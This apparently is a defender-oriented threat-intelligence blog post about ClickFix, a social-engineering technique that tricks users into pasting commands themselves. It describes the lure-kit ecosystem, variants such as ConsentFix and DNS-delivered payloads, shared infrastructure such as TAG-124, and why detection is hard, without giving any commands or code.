In 2022, Microsoft blocked VBA macros by default. Attackers spent the next year figuring out what would replace them. What they landed on was simple: show a convincing error message, tell the user to paste a command to fix it, and let them execute it themselves. That is ClickFix. By 2025 it accounted for roughly 47% of observed attacks, surged sharply year over year, and was being used by both cybercrime groups and at least nine nation-state actors.
ClickFix spread the way it did because it is not just a technique, it is an ecosystem. A small developer tier sells builder kits that let operators create convincing lure pages with minimal effort. Those lures have come a long way from simple CAPTCHA prompts and now include full-screen update simulations, browser repair flows, and platform-aware delivery that serves different content depending on the victim's OS. A larger affiliate layer distributes them at scale through phishing, malvertising, and thousands of compromised websites, with traffic distribution systems handling targeting and routing. Payloads are modular, operators mix infostealers, RATs, and ransomware precursors depending on what they are after.
The technique kept evolving too. ConsentFix, for example, steals OAuth tokens through normal browser flows with nothing written to disk, which means MFA does not help and most detection logic is looking in the wrong place. A variant confirmed in early 2026 delivers payloads through DNS response fields, blending with traffic that no one is blocking.
The infrastructure creates overlap that matters for defenders. Traffic distribution systems like TAG-124 have been observed serving both ransomware affiliates and nation-state operations simultaneously. Stolen credentials get reused to compromise more websites, those sites host more campaigns, and the cycle keeps running without much external input.
Detection is harder here than with most techniques because the activity looks like normal user behavior at every step. Key execution happens in places with limited visibility, file reputation is not useful, and infrastructure rotates faster than blocklists. Most EDRs log the activity. Fewer alert on it in time to matter.
We share the detection approaches that have held up across campaigns, along with a practical breakdown of where disruption pays off most. The credential feedback loop is the right place to start. Break that and the infrastructure scaling these campaigns starts running out of fuel.
